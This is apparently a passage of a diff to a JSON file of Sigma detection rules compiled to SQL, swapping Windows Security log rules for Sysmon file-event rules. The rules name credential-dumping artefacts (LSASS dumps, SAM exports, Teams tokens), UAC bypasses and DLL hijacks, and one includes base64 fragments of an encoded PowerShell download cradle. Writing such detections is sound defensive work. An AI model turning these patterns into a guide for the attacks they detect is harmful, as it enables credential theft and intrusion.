ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "LSASS Process Dump Artefact In CrashDumps 
Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. 
Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml" + }, + { + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent 
LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of tasks from processes executed from suspicious 
locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.003" + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": 
"critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - 
"filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", 
"attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part 
of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - 
"attack.t1569.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": 
"252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp 
folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE 
'%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": 
"file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE 